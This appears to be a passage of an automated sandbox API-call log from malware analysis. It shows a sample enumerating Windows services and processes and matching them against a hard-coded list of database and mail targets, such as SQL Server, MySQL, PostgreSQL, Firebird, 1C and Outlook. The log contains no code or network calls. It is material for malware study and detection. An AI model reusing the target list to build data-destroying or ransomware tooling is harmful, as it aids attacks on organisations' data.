returned 4 [0051.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0051.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0051.174] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0051.174] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0051.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0051.174] lstrlenW (lpString="ShellHWDetection") returned 16 [0051.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0051.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0051.174] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0051.174] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0051.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0051.174] lstrlenW (lpString="Spooler") returned 7 [0051.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0051.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0051.174] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0051.174] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0051.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0051.174] lstrlenW (lpString="swprv") returned 5 [0051.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0051.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0051.174] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0051.174] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0051.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0051.174] lstrlenW (lpString="SysMain") returned 7 [0051.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0051.174] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0051.174] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0051.174] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0051.174] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0051.174] lstrlenW (lpString="Themes") returned 6 [0051.174] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0051.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0051.175] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0051.175] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0051.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0051.175] lstrlenW (lpString="TrkWks") returned 6 [0051.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0051.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0051.175] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0051.175] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0051.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0051.175] lstrlenW (lpString="UxSms") returned 5 [0051.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0051.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0051.175] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0051.175] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0051.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0051.175] lstrlenW (lpString="VSS") returned 3 [0051.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0051.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0051.175] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0051.175] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0051.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0051.175] lstrlenW (lpString="WdiServiceHost") returned 14 [0051.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0051.175] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0051.175] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0051.175] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0051.175] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0051.175] lstrlenW (lpString="WdiSystemHost") returned 13 [0051.175] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0051.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0051.176] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0051.176] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0051.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0051.176] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0051.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0051.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0051.176] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0051.176] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0051.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0051.176] lstrlenW (lpString="Winmgmt") returned 7 [0051.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0051.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0051.176] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0051.176] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0051.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0051.176] lstrlenW (lpString="WPDBusEnum") returned 10 [0051.176] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0051.176] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0051.176] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0051.176] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0051.176] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0051.176] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x666b08 | out: hHeap=0x570000) returned 1 [0051.178] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e4 [0051.180] Process32FirstW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0051.181] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0051.182] lstrlenW (lpString="System") returned 6 [0051.182] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0051.182] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0051.182] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0051.182] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0051.182] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0051.182] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0051.182] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0051.182] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0051.182] lstrlenW (lpString="smss.exe") returned 8 [0051.182] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0051.182] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0051.182] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0051.183] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0051.183] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0051.183] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0051.183] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0051.183] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.183] lstrlenW (lpString="csrss.exe") returned 9 [0051.183] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0051.183] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0051.183] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0051.183] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0051.183] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0051.183] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0051.183] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0051.183] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0051.184] lstrlenW (lpString="wininit.exe") returned 11 [0051.184] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0051.184] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0051.184] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0051.184] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.185] lstrlenW (lpString="csrss.exe") returned 9 [0051.185] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0051.186] lstrlenW (lpString="winlogon.exe") returned 12 [0051.186] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0051.187] lstrlenW (lpString="services.exe") returned 12 [0051.187] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0051.187] lstrlenW (lpString="lsass.exe") returned 9 [0051.187] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0051.188] lstrlenW (lpString="lsm.exe") returned 7 [0051.188] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.189] lstrlenW (lpString="svchost.exe") returned 11 [0051.189] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.189] lstrlenW (lpString="svchost.exe") returned 11 [0051.189] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.190] lstrlenW (lpString="svchost.exe") returned 11 [0051.190] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.191] lstrlenW (lpString="svchost.exe") returned 11 [0051.191] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.192] lstrlenW (lpString="svchost.exe") returned 11 [0051.192] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0051.192] lstrlenW (lpString="audiodg.exe") returned 11 [0051.192] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.193] lstrlenW (lpString="svchost.exe") returned 11 [0051.193] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.194] lstrlenW (lpString="svchost.exe") returned 11 [0051.194] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0051.195] lstrlenW (lpString="dwm.exe") returned 7 [0051.195] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0051.195] lstrlenW (lpString="explorer.exe") returned 12 [0051.195] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0051.196] lstrlenW (lpString="spoolsv.exe") returned 11 [0051.196] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0051.197] lstrlenW (lpString="taskhost.exe") returned 12 [0051.197] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.197] lstrlenW (lpString="svchost.exe") returned 11 [0051.197] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0051.198] lstrlenW (lpString="taskeng.exe") returned 11 [0051.198] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0051.199] lstrlenW (lpString="taskhost.exe") returned 12 [0051.199] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0051.200] lstrlenW (lpString="called.exe") returned 10 [0051.200] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0051.200] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0051.200] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0051.201] lstrlenW (lpString="analyst.exe") returned 11 [0051.201] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0051.202] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0051.202] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0051.202] lstrlenW (lpString="wages.exe") returned 9 [0051.202] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0051.203] lstrlenW (lpString="rand.exe") returned 8 [0051.203] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0051.204] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0051.204] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0051.551] lstrlenW (lpString="cottage.exe") returned 11 [0051.554] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0051.570] lstrlenW (lpString="pairs_spec.exe") returned 14 [0051.572] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0051.583] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0051.583] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0051.585] lstrlenW (lpString="observationshairy.exe") returned 21 [0051.585] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0051.586] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0051.586] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0051.588] lstrlenW (lpString="spectrum.exe") returned 12 [0051.588] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0051.589] lstrlenW (lpString="dies.exe") returned 8 [0051.589] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0051.590] lstrlenW (lpString="configured.exe") returned 14 [0051.590] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0051.590] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0051.591] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0051.591] lstrlenW (lpString="fast.exe") returned 8 [0051.591] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0051.592] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0051.592] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0051.593] lstrlenW (lpString="review.exe") returned 10 [0051.593] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0051.593] lstrlenW (lpString="historybinding.exe") returned 18 [0051.593] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0051.594] lstrlenW (lpString="pk task surge.exe") returned 17 [0051.594] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0051.595] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0051.595] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0051.596] lstrlenW (lpString="mobsync.exe") returned 11 [0051.596] Process32NextW (in: hSnapshot=0x1e4, lppe=0x217fd34 | out: 